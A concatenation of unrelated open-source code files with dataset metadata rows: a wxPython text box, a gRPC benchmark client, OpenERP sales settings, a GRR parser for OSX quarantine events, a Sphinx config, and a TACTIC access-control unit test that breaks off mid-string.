response = self.logged_in_client.get(reverse('Log Out'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], 'http://testserver/')
def tearDown(self):
self.user.delete()
| mit | -7,607,565,814,630,485,000 | 36 | 91 | 0.646959 | false |
bblais/plasticity | plasticity/dialogs/waxy/textbox.py | 1 | 4652 | # textbox.py
import waxyobject
import wx
import core
import styles
class TextBox(wx.TextCtrl, waxyobject.WaxyObject):
__events__ = {
'Char': wx.EVT_CHAR, # do all controls have this?
'MaxLength': wx.EVT_TEXT_MAXLEN, # alias for TextMaxLen
'Text': wx.EVT_TEXT,
'TextEnter': wx.EVT_TEXT_ENTER,
'TextMaxLen': wx.EVT_TEXT_MAXLEN,
'TextURL': wx.EVT_TEXT_URL,
}
def __init__(self, parent, text="", size=None, **kwargs):
style = 0
style |= self._params(kwargs)
style |= styles.window(kwargs)
wx.TextCtrl.__init__(self, parent, wx.NewId(), text,
size=size or (125,-1), style=style)
self.BindEvents()
styles.properties(self, kwargs)
def write(self, s):
# Added so we can use a TextBox as a file-like object and redirect
# stdout to it.
self.AppendText(s)
try:
core.Yield()
except:
pass
def GetCurrentLineNumber(self):
""" Return the current line number (i.e. the number of the line the
cursor is on). """
pos = self.GetInsertionPoint()
x, y = self.PositionToXY(pos)
return y
def GetLines(self):
""" Return the current text as a list of lines. (Changing the list
does not affect the contents of the TextBox.) """
text = self.GetValue()
lines = text.split("\n")
return lines
def SetModified(self, modified):
if modified:
# set to modified by appending a dummy space and removing it again
self.AppendText(' ')
lastpos = self.GetLastPosition()
self.Remove(lastpos-1, lastpos)
else:
self.DiscardEdits()
def GetModified(self):
""" Returns true if the contents of the control were modified. (Alias
for IsModified(). """
return self.IsModified()
def InsertText(self, pos, text):
""" Insert text at the given position. """
old_insertion_point = self.GetInsertionPoint()
self.SetInsertionPoint(pos)
self.WriteText(text)
# put cursor at original insertion point
if old_insertion_point <= pos:
self.SetInsertionPoint(old_insertion_point)
else:
self.SetInsertionPoint(old_insertion_point + len(text))
# ideas:
# should Remove support negative indexes? (like slices)
# should it support slicing? e.g. del atextbox[10:20]
#
# style parameters
#_textbox_justify = {
# "left": wx.TE_LEFT,
# "center": wx.TE_CENTRE,
# "centre": wx.TE_CENTRE,
# "middle": wx.TE_CENTRE,
# "right": wx.TE_RIGHT,
#}
__styles__ = {
'justify': ({
'left': wx.TE_LEFT,
'center': wx.TE_CENTRE,
'centre': wx.TE_CENTRE,
'middle': wx.TE_CENTRE,
'right': wx.TE_RIGHT,
}, styles.DICTSTART),
'multiline': (wx.TE_MULTILINE, styles.NORMAL),
'password': (wx.TE_PASSWORD, styles.NORMAL),
'readonly': (wx.TE_READONLY, styles.NORMAL),
'wrap': (wx.TE_DONTWRAP, styles.NORMAL | styles.REVERSE),
'process_enter': (wx.TE_PROCESS_ENTER, styles.NORMAL),
'process_tab': (wx.TE_PROCESS_TAB, styles.NORMAL),
'rich': (wx.TE_RICH, styles.NORMAL),
'rich2': (wx.TE_RICH2, styles.NORMAL),
'auto_url': (wx.TE_AUTO_URL, styles.NORMAL),
'hscroll': (wx.HSCROLL, styles.NORMAL),
}
def _params(self, kwargs):
flags = 0 | wx.TE_NOHIDESEL # maybe add the option of changing this one
#flags |= styles.stylebool('multiline', wx.TE_MULTILINE, kwargs)
#flags |= styles.stylebool('password', wx.TE_PASSWORD, kwargs)
#flags |= styles.stylebool('readonly', wx.TE_READONLY, kwargs)
#flags |= styles.stylebool('wrap', wx.TE_DONTWRAP, kwargs, reverse=1)
#flags |= styles.stylebool('process_enter', wx.TE_PROCESS_ENTER, kwargs)
#flags |= styles.stylebool('process_tab', wx.TE_PROCESS_TAB, kwargs)
#flags |= styles.stylebool('rich', wx.TE_RICH, kwargs)
#flags |= styles.stylebool('rich2', wx.TE_RICH2, kwargs)
#flags |= styles.stylebool('auto_url', wx.TE_AUTO_URL, kwargs)
#flags |= styles.stylebool('hscroll', wx.HSCROLL, kwargs)
#flags |= styles.styledictstart('justify', self._textbox_justify, kwargs, 0)
flags |= styles.dostyle(self.__styles__, kwargs)
return flags
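# --- Editor's sketch: typical TextBox usage inside a waxy frame ---
# (`frame` is a hypothetical parent window); left commented out because it
# needs a running GUI event loop:
#
# log = TextBox(frame, multiline=1, readonly=1, wrap=1)
# import sys
# sys.stdout = log  # works because TextBox implements write()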
| mit | -8,663,121,945,709,910,000 | 34.34375 | 84 | 0.565993 | false |
wcevans/grpc | src/python/grpcio_tests/tests/qps/benchmark_client.py | 23 | 7701 | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Defines test client behaviors (UNARY/STREAMING) (SYNC/ASYNC)."""
import abc
import threading
import time
from concurrent import futures
from six.moves import queue
import grpc
from src.proto.grpc.testing import messages_pb2
from src.proto.grpc.testing import services_pb2
from tests.unit import resources
from tests.unit import test_common
_TIMEOUT = 60 * 60 * 24
class GenericStub(object):
def __init__(self, channel):
self.UnaryCall = channel.unary_unary(
'/grpc.testing.BenchmarkService/UnaryCall')
self.StreamingCall = channel.stream_stream(
'/grpc.testing.BenchmarkService/StreamingCall')
class BenchmarkClient:
"""Benchmark client interface that exposes a non-blocking send_request()."""
__metaclass__ = abc.ABCMeta
def __init__(self, server, config, hist):
# Create the stub
if config.HasField('security_params'):
creds = grpc.ssl_channel_credentials(
resources.test_root_certificates())
channel = test_common.test_secure_channel(
server, creds, config.security_params.server_host_override)
else:
channel = grpc.insecure_channel(server)
# waits for the channel to be ready before we start sending messages
grpc.channel_ready_future(channel).result()
if config.payload_config.WhichOneof('payload') == 'simple_params':
self._generic = False
self._stub = services_pb2.BenchmarkServiceStub(channel)
payload = messages_pb2.Payload(
body='\0' * config.payload_config.simple_params.req_size)
self._request = messages_pb2.SimpleRequest(
payload=payload,
response_size=config.payload_config.simple_params.resp_size)
else:
self._generic = True
self._stub = GenericStub(channel)
self._request = '\0' * config.payload_config.bytebuf_params.req_size
self._hist = hist
self._response_callbacks = []
def add_response_callback(self, callback):
"""callback will be invoked as callback(client, query_time)"""
self._response_callbacks.append(callback)
@abc.abstractmethod
def send_request(self):
"""Non-blocking wrapper for a client's request operation."""
raise NotImplementedError()
def start(self):
pass
def stop(self):
pass
def _handle_response(self, client, query_time):
self._hist.add(query_time * 1e9) # Report times in nanoseconds
for callback in self._response_callbacks:
callback(client, query_time)
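# Illustrative usage sketch (not part of the original file); assumes a
# concrete subclass, a reachable qps server address and config/hist objects:
#
#   client = UnarySyncBenchmarkClient('localhost:50051', config, hist)
#   client.add_response_callback(
#       lambda c, secs: sys.stdout.write('rtt: %.3fms\n' % (secs * 1e3)))
#   client.start()
#   client.send_request()  # non-blocking; latency lands in hist via callback
#   client.stop()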
class UnarySyncBenchmarkClient(BenchmarkClient):
def __init__(self, server, config, hist):
super(UnarySyncBenchmarkClient, self).__init__(server, config, hist)
self._pool = futures.ThreadPoolExecutor(
max_workers=config.outstanding_rpcs_per_channel)
def send_request(self):
        # Send requests in separate threads to support multiple outstanding RPCs
# (See src/proto/grpc/testing/control.proto)
self._pool.submit(self._dispatch_request)
def stop(self):
self._pool.shutdown(wait=True)
self._stub = None
def _dispatch_request(self):
start_time = time.time()
self._stub.UnaryCall(self._request, _TIMEOUT)
end_time = time.time()
self._handle_response(self, end_time - start_time)
class UnaryAsyncBenchmarkClient(BenchmarkClient):
def send_request(self):
# Use the Future callback api to support multiple outstanding rpcs
start_time = time.time()
response_future = self._stub.UnaryCall.future(self._request, _TIMEOUT)
response_future.add_done_callback(
lambda resp: self._response_received(start_time, resp))
def _response_received(self, start_time, resp):
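        # result() re-raises any RPC error from the future, so failed calls
        # are surfaced instead of being recorded as successful latencies.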
resp.result()
end_time = time.time()
self._handle_response(self, end_time - start_time)
def stop(self):
self._stub = None
class _SyncStream(object):
def __init__(self, stub, generic, request, handle_response):
self._stub = stub
self._generic = generic
self._request = request
self._handle_response = handle_response
self._is_streaming = False
self._request_queue = queue.Queue()
self._send_time_queue = queue.Queue()
def send_request(self):
self._send_time_queue.put(time.time())
self._request_queue.put(self._request)
def start(self):
self._is_streaming = True
response_stream = self._stub.StreamingCall(self._request_generator(),
_TIMEOUT)
for _ in response_stream:
self._handle_response(
self, time.time() - self._send_time_queue.get_nowait())
def stop(self):
self._is_streaming = False
def _request_generator(self):
while self._is_streaming:
try:
request = self._request_queue.get(block=True, timeout=1.0)
yield request
except queue.Empty:
pass
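# The generator above bridges the blocking queue and gRPC's request-iterator
# API: StreamingCall pulls requests lazily, and the 1-second timeout lets the
# generator re-check _is_streaming so stop() can end the stream cleanly.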
class StreamingSyncBenchmarkClient(BenchmarkClient):
def __init__(self, server, config, hist):
super(StreamingSyncBenchmarkClient, self).__init__(server, config, hist)
self._pool = futures.ThreadPoolExecutor(
max_workers=config.outstanding_rpcs_per_channel)
self._streams = [
_SyncStream(self._stub, self._generic, self._request,
self._handle_response)
            for _ in range(config.outstanding_rpcs_per_channel)
]
self._curr_stream = 0
def send_request(self):
# Use a round_robin scheduler to determine what stream to send on
self._streams[self._curr_stream].send_request()
self._curr_stream = (self._curr_stream + 1) % len(self._streams)
def start(self):
for stream in self._streams:
self._pool.submit(stream.start)
def stop(self):
for stream in self._streams:
stream.stop()
self._pool.shutdown(wait=True)
self._stub = None
| bsd-3-clause | 7,927,491,750,135,370,000 | 35.15493 | 80 | 0.65446 | false |
joaormatos/anaconda | Chowdren/chowdren/writers/extensions/EasyScrollbar.py | 1 | 1944 | from chowdren.writers.objects import ObjectWriter
from chowdren.common import get_animation_name, to_c, make_color
from chowdren.writers.events import (ComparisonWriter, ActionMethodWriter,
ConditionMethodWriter, ExpressionMethodWriter, make_table)
from mmfparser.bitdict import BitDict
from mmfparser.data.font import LogFont
import glob, os
class ScrollbarObject(ObjectWriter):
class_name = 'ScrollbarObject'
filename = 'scrollbarext'
def write_init(self, writer):
data = self.get_data()
width = data.readShort(True)
height = data.readShort(True)
#hidden = data.readByte() != 0
#enabled = data.readByte() != 0
#tab_stop = data.readByte() != 0
data.skipBytes(3)
vertical = data.readByte() != 0
min_val = data.readInt(True)
max_val = data.readInt(True)
val = data.readInt(True)
# Last 4 bytes are always '4 0 0 0' (?)
writer.putlnc('width = %s;', width)
writer.putlnc('height = %s;', height)
writer.putlnc('vertical = %s;', vertical)
writer.putlnc('min_val = %s;', min_val)
writer.putlnc('max_val = %s;', max_val)
writer.putlnc('init_scrollbar(%s);', val)
def has_updates(self):
return True
#def get_sources(self):
# script_dir = os.path.dirname(__file__)
# base_dir = os.path.join(script_dir, '..', '..', '..', 'base')
# base_dir = os.path.abspath(base_dir)
# print glob.glob(os.path.join(base_dir, 'staticlibs', 'gwen', '*.cpp'))
# return ['objects/scrollbarext.cpp']
actions = make_table(ActionMethodWriter, {
1 : 'set_scroll_range',
9 : 'set_width',
10 : 'set_height',
11 : 'set_visible(true)',
12 : 'set_visible(false)'
})
conditions = make_table(ConditionMethodWriter, {
})
expressions = make_table(ExpressionMethodWriter, {
0 : 'get_value'
})
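    # The integer keys above are (presumably) the extension's MMF2 action/
    # expression IDs; make_table maps each ID to a runtime method or snippet,
    # e.g. action 1 dispatches to ScrollbarObject's set_scroll_range(...).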
def get_object():
return ScrollbarObject
| gpl-3.0 | -8,162,581,802,974,518,000 | 28.907692 | 79 | 0.622942 | false |
0k/OpenUpgrade | addons/sale_stock/res_config.py | 331 | 5235 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2012 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.tools.translate import _
class sale_configuration(osv.osv_memory):
_inherit = 'sale.config.settings'
_columns = {
'group_invoice_deli_orders': fields.boolean('Generate invoices after and based on delivery orders',
implied_group='sale_stock.group_invoice_deli_orders',
help="To allow your salesman to make invoices for Delivery Orders using the menu 'Deliveries to Invoice'."),
'task_work': fields.boolean("Prepare invoices based on task's activities",
help='Lets you transfer the entries under tasks defined for Project Management to '
                'the Timesheet line entries for a particular date and user, with the effect of creating, editing and deleting either way, '
                'and automatically creating project tasks from procurement lines.\n'
'-This installs the modules project_timesheet and sale_service.'),
'default_order_policy': fields.selection(
[('manual', 'Invoice based on sales orders'), ('picking', 'Invoice based on deliveries')],
'The default invoicing method is', default_model='sale.order',
help="You can generate invoices based on sales orders or based on shippings."),
'module_delivery': fields.boolean('Allow adding shipping costs',
help='Allows you to add delivery methods in sales orders and delivery orders.\n'
'You can define your own carrier and delivery grids for prices.\n'
'-This installs the module delivery.'),
'default_picking_policy' : fields.boolean("Deliver all at once when all products are available.",
help = "Sales order by default will be configured to deliver all products at once instead of delivering each product when it is available. This may have an impact on the shipping price."),
'group_mrp_properties': fields.boolean('Product properties on order lines',
implied_group='sale.group_mrp_properties',
help="Allows you to tag sales order lines with properties."),
'module_project_timesheet': fields.boolean("Project Timesheet"),
'module_sale_service': fields.boolean("Sale Service"),
'group_route_so_lines': fields.boolean('Choose MTO, drop shipping,... on sales order lines',
implied_group='sale_stock.group_route_so_lines',
help="Allows you to choose a delivery route on sales order lines"),
}
_defaults = {
'default_order_policy': 'manual',
}
def default_get(self, cr, uid, fields, context=None):
res = super(sale_configuration, self).default_get(cr, uid, fields, context)
# task_work, time_unit depend on other fields
res['task_work'] = res.get('module_sale_service') and res.get('module_project_timesheet')
return res
def get_default_sale_config(self, cr, uid, ids, context=None):
ir_values = self.pool.get('ir.values')
default_picking_policy = ir_values.get_default(cr, uid, 'sale.order', 'picking_policy')
return {
'default_picking_policy': default_picking_policy == 'one',
}
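    # Note: ir_values stores picking_policy as 'one'/'direct'; the boolean
    # round-trip is (hypothetical values shown):
    #   get_default(...) == 'one'  -> default_picking_policy = True
    #   set_default(..., 'one' if wizard.default_picking_policy else 'direct')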
def set_sale_defaults(self, cr, uid, ids, context=None):
if uid != SUPERUSER_ID and not self.pool['res.users'].has_group(cr, uid, 'base.group_erp_manager'):
raise openerp.exceptions.AccessError(_("Only administrators can change the settings"))
ir_values = self.pool.get('ir.values')
wizard = self.browse(cr, uid, ids)[0]
default_picking_policy = 'one' if wizard.default_picking_policy else 'direct'
ir_values.set_default(cr, SUPERUSER_ID, 'sale.order', 'picking_policy', default_picking_policy)
res = super(sale_configuration, self).set_sale_defaults(cr, uid, ids, context)
return res
def onchange_invoice_methods(self, cr, uid, ids, group_invoice_so_lines, group_invoice_deli_orders, context=None):
if not group_invoice_deli_orders:
return {'value': {'default_order_policy': 'manual'}}
if not group_invoice_so_lines:
return {'value': {'default_order_policy': 'picking'}}
return {}
| agpl-3.0 | 4,673,494,245,140,591,000 | 55.902174 | 200 | 0.65043 | false |
MiniSEC/GRR_clone | parsers/osx_quarantine.py | 6 | 2638 | #!/usr/bin/env python
#
# Copyright 2012 Google Inc. All Rights Reserved.
"""Parser for OSX quarantine sqlite files."""
__program__ = "osx_quarantine.py"
import datetime
import glob
import locale
import sys
from grr.parsers import sqlite_file
class OSXQuarantineEvents(sqlite_file.SQLiteFile):
"""Class for handling the parsing of a OSX quarantine events.
Use as:
c = OSXQuarantineEvents(open('com.apple.LaunchServices.QuarantineEvents'))
for event in c.Parse():
print event
"""
# OSX Timestamp is seconds since January 1st 2001.
EVENTS_QUERY = ("select (LSQuarantineTimeStamp+978328800)*1e6,"
"LSQuarantineAgentBundleIdentifier, LSQuarantineAgentName,"
"LSQuarantineDataURLString, LSQuarantineSenderName,"
"LSQuarantineSenderAddress, LSQuarantineTypeNumber,"
"LSQuarantineOriginTitle, LSQuarantineOriginURLString,"
"LSQuarantineOriginAlias "
"from LSQuarantineEvent "
"ORDER BY LSQuarantineTimeStamp"
)
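  # LSQuarantineTimeStamp counts seconds from the Cocoa epoch (2001-01-01);
  # adding 978328800 shifts it onto the Unix epoch (the constant bakes in a
  # fixed offset), and * 1e6 converts seconds to microseconds.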
def Parse(self):
"""Iterator returning dict for each entry in history."""
for data in self.Query(self.EVENTS_QUERY):
(timestamp, agent_bundle_identifier, agent_name, url, sender,
sender_address, type_number, title, referrer, referrer_alias) = data
yield [timestamp, "OSX_QUARANTINE", url, referrer, title, agent_name,
agent_bundle_identifier, sender, sender_address, type_number,
referrer_alias]
def main(argv):
if len(argv) < 2:
print "Usage: %s com.apple.LaunchServices.QuarantineEvents" % __program__
sys.exit(1)
encoding = locale.getpreferredencoding()
if encoding.upper() != "UTF-8":
print "%s requires an UTF-8 capable console/terminal" % __program__
sys.exit(1)
files_to_process = []
for input_glob in argv[1:]:
files_to_process += glob.glob(input_glob)
for input_file in files_to_process:
events = OSXQuarantineEvents(open(input_file))
for data in events.Parse():
timestamp, entry_type, url, data1, data2, data3, _, _, _, _, _ = data
try:
date_string = datetime.datetime(1970, 1, 1)
date_string += datetime.timedelta(microseconds=timestamp)
date_string = u"%s+00:00" % (date_string)
except TypeError:
date_string = timestamp
except ValueError:
date_string = timestamp
output_string = u"%s\t%s\t%s\t%s\t%s\t%s" % (
date_string, entry_type, url, data1, data2, data3)
print output_string.encode("UTF-8")
if __name__ == "__main__":
main(sys.argv)
| apache-2.0 | 2,962,586,625,934,899,700 | 30.404762 | 80 | 0.645944 | false |
rbrito/pkg-youtube-dl | docs/conf.py | 39 | 2276 | # coding: utf-8
#
# youtube-dl documentation build configuration file, created by
# sphinx-quickstart on Fri Mar 14 21:05:43 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# Allows to import youtube_dl
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# -- General configuration ------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'youtube-dl'
copyright = u'2014, Ricardo Garcia Gonzalez'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
from youtube_dl.version import __version__
version = __version__
# The full version, including alpha/beta/rc tags.
release = version
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Output file base name for HTML help builder.
htmlhelp_basename = 'youtube-dldoc'
| unlicense | 6,791,673,059,441,473,000 | 31.056338 | 79 | 0.714411 | false |
Southpaw-TACTIC/TACTIC | src/pyasm/security/security_test.py | 1 | 30165 | #!/usr/bin/env python
###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = ["SecurityTest"]
import tacticenv
from pyasm.common import Environment, SecurityException, Xml, Config
from pyasm.search import *
from pyasm.unittest import *
from pyasm.biz import Project, ExpressionParser
from pyasm.security import Login
from .security import *
from .drupal_password_hasher import DrupalPasswordHasher
from .access_manager import *
from .batch import *
from .crypto_key import *
import unittest
class SecurityTest(unittest.TestCase):
def _setup(self):
# intialiaze the framework as a batch process
Site.set_site('default')
security = Environment.get_security()
from pyasm.biz import Project
Project.set_project("unittest")
self.security = Environment.get_security()
self.user = 'unittest_guy'
self.password = 'cow'
self.encrypted = Login.encrypt_password(self.password)
self.person = None
# start a transaction
self.transaction = Transaction.get(create=True)
#self.transaction.start()
# IF Portal
portal_enabled = Config.get_value("portal", "enabled") == "true"
if portal_enabled:
try:
site = Site.set_site("default")
# create the user
login = SObjectFactory.create("portal/client")
login.set_value("login", self.user)
login.set_value("password", self.encrypted)
login.commit()
finally:
Site.pop_site()
# create the user
login = SObjectFactory.create("sthpw/login")
login.set_value("login", self.user)
login.set_value("password", self.encrypted)
login.set_value("login_groups", "test")
login.commit()
s = Search('sthpw/login_group')
s.add_filter('login_group','user')
group = s.get_sobject()
if not group:
group = SObjectFactory.create("sthpw/login_group")
group.set_value("login_group", 'user')
group.set_value('access_level','min')
group.commit()
s = Search('sthpw/login_in_group')
s.add_filter('login',self.user)
s.add_filter('login_group', 'user')
lng = s.get_sobject()
if lng:
lng.delete()
# create the user2
login = SObjectFactory.create("sthpw/login")
login.set_value("login", 'unittest_gal')
login.set_value("password", self.encrypted)
login.set_value("login_groups", "test")
login.commit()
# create the user3 and add to a group
login = SObjectFactory.create("sthpw/login")
login.set_value("login", 'unittest_dan')
login.set_value("password", self.encrypted)
login.commit()
login = SObjectFactory.create("sthpw/login_group")
login.set_value("login_group", 'unittest_med')
login.commit()
login = SObjectFactory.create("sthpw/login_group")
login.set_value("login_group", 'test')
login.commit()
l_in_g = SObjectFactory.create("sthpw/login_in_group")
l_in_g.set_value("login", 'unittest_dan')
l_in_g.set_value("login_group", 'unittest_med')
l_in_g.commit()
l_in_g = SObjectFactory.create("sthpw/login_in_group")
l_in_g.set_value("login", self.user)
l_in_g.set_value("login_group", 'test')
l_in_g.commit()
def _tear_down(self):
#self.transaction = Transaction.get()
self.transaction.rollback()
        # This is necessary because set_value() may have been caught in a security exception; needs investigation.
#if self.person:
# self.person.delete()
tasks = Search.eval("@SOBJECT(sthpw/task['project_code','in','unittest|sample3d'])")
for task in tasks:
task.delete(triggers=False)
def test_all(self):
batch = Batch()
Environment.get_security().set_admin(True)
from pyasm.unittest import UnittestEnvironment, Sample3dEnvironment
test_env = UnittestEnvironment()
test_env.create()
sample3d_env = Sample3dEnvironment(project_code='sample3d')
sample3d_env.create()
Project.set_project("unittest")
try:
self.access_manager = Environment.get_security().get_access_manager()
self._test_all()
finally:
# Reset access manager for tear down
Environment.get_security()._access_manager = self.access_manager
Environment.get_security().reset_access_manager()
self._tear_down()
Environment.get_security().set_admin(True)
test_env.delete()
Environment.get_security().set_admin(True)
sample3d_env.delete()
Site.pop_site()
def _test_initial_access_level(self):
        # Before adding process rules, unittest_guy (in the 'user' group) has MIN access_level,
        # so he has no access to processes, but does have access to search_types
self.security.set_admin(False)
security = Environment.get_security()
process_keys = [{'process': 'anim'}]
proc_access = security.check_access("process", process_keys, "allow")
self.assertEqual(proc_access, False)
stype_keys = [{'code':'*'}, {'code':'unittest/city'}]
stype_access = security.check_access("search_type", stype_keys, "allow")
a = security.get_access_manager()
self.assertEqual(stype_access, True)
# we don't have this sType specified explicitly, should be False
stype_keys = [{'code':'unittest/city'}]
stype_access = security.check_access("search_type", stype_keys, "allow")
a = security.get_access_manager()
self.assertEqual(stype_access, False)
def _test_all(self):
try:
self._setup()
self._test_crypto()
self._test_drupal()
self._test_security_fail()
self._test_security_pass()
self._test_initial_access_level()
self._test_sobject_access_manager()
# order matters here
self._test_search_filter()
self._test_access_level()
self._test_access_manager()
self._test_guest_allow()
except Exception as e:
print("Error: ", e)
raise
def _test_drupal(self):
password = "tactic"
salt = "DPRNKWLY"
new = DrupalPasswordHasher().encode(password, salt, 'D')
encoded = "$S$DDPRNKWLY5IwB.aQlCm/OLRrFxZmpa7Rk/kjm/J45bGNGTXUsRxq"
self.assertEqual(new, encoded)
verify = DrupalPasswordHasher().verify("tactic", encoded)
self.assertEqual(True, verify)
def _test_security_fail(self):
# should fail
password = 'test'
fail = False
try:
self.security.login_user(self.user,password)
except SecurityException as e:
fail = True
self.assertEqual( True, fail )
def _test_security_pass(self):
fail = False
try:
self.security.login_user(self.user,self.password)
except SecurityException as e:
fail = True
user = Environment.get_user_name()
# set this user as admin
self.security.set_admin(True)
self.assertEqual('unittest_guy', user)
self.assertEqual( False, fail )
def count(self, it):
from collections import defaultdict
d = defaultdict(int)
for j in it:
d[j] += 1
return d
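    # e.g. self.count(['a', 'b', 'a']) -> {'a': 2, 'b': 1}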
def _test_search_filter(self):
        # NOTE: this unittest is flawed because it relies on projects
        # that may not exist
self.security.set_admin(False)
# exclude sample3d tasks and include unittest tasks only
rules = """
<rules>
<rule value='sample3d' search_type='sthpw/task' column='project_code' op='!=' group='search_filter'/>
<rule value='unittest' search_type='sthpw/task' column='project_code' group='search_filter'/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
search = Search('sthpw/task')
tasks = search.get_sobjects()
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual(False, 'sample3d' in project_codes)
self.assertEqual(True, 'unittest' in project_codes)
# test list-based expression
rules = """
<rules>
<rule value='$PROJECT' search_type='sthpw/task' column='project_code' group='search_filter'/>
<rule value="@GET(sthpw/login['login','EQ','unittest'].login)" search_type='sthpw/task' op='in' column='assigned' group='search_filter' project='*'/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
# reset it
Environment.get_security().reset_access_manager()
self.security.set_admin(False)
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
search = Search('sthpw/task')
tasks = search.get_sobjects()
# 3 tasks were created above for a person
self.assertEqual(3, len(tasks))
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual({'unittest_guy': 1,'unittest_gal': 1}, self.count(assigned_codes))
self.assertEqual(True, ['unittest'] == project_codes)
rules = """
<rules>
<rule group="project" code='sample3d' access='allow'/>
<rule group="project" code='unittest' access='allow'/>
<rule group="project" code='art' access='allow'/>
<rule value='$PROJECT' search_type='sthpw/task' column='project_code' group='search_filter'/>
<rule value='@GET(login.login)' search_type='sthpw/task' column='assigned' group='search_filter' project='*'/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
# reset it
security = Environment.get_security()
security.reset_access_manager()
access_manager = security.get_access_manager()
access_manager.add_xml_rules(xml)
search = Search('sthpw/task')
tasks = search.get_sobjects()
# 2 tasks were created above for unittest_guy
self.assertEqual(2, len(tasks))
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual(True, ['unittest_guy'] == assigned_codes)
self.assertEqual(True, ['unittest'] == project_codes)
Project.set_project('sample3d')
try:
search = Search('sthpw/task')
tasks = search.get_sobjects()
self.assertEqual(1, len(tasks))
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual(True, ['unittest_guy'] == assigned_codes)
self.assertEqual(True, ['sample3d'] == project_codes)
finally:
Project.set_project('unittest')
# project specific rule
proj_rules = """
<rules>
<rule group="project" code='sample3d' access='allow'/>
<rule group="project" code='unittest' access='allow'/>
<rule value='$PROJECT' search_type='sthpw/task' column='project_code' group='search_filter'/>
<rule value='@GET(login.login)' search_type='sthpw/task' column='assigned' group='search_filter' project='unittest'/>
<rule group="process" process="anim" access="allow"/>
<rule group="process" process="comp" access="allow"/>
</rules>
"""
xml = Xml()
xml.read_string(proj_rules)
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
project = Project.get_by_code('sample3d')
if project:
Project.set_project('sample3d')
search = Search('sthpw/task')
tasks = search.get_sobjects()
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
            # should fail since the project is switched to sample3d... and it should have more than just unittest
self.assertEqual(False, ['unittest'] == assigned_codes)
self.assertEqual(True, ['sample3d'] == project_codes)
        # unittest-specific rule that uses negation (!=); this takes care of NULL values automatically
rules = """
<rules>
